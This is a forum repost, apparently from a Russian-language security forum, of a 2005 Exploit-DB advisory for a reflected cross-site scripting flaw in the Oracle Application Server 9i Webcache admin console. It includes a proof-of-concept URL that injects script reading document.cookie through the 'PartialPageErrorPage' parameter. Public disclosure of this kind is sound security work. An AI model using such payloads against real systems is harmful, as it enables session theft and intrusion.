Exploit Oracle Application Server 9i - Webcache PartialPageErrorPage Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25563
Проверка EDB
  1. Пройдено
Автор
ALEXANDER KORNBRUST
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2005-1381
Дата публикации
2005-04-28
Код:
source: https://www.securityfocus.com/bid/13422/info

A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

The issue affects the 'PartialPageErrorPage' parameter of the 'webcacheadmin' script. 

http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2
 
Источник
www.exploit-db.com

Похожие темы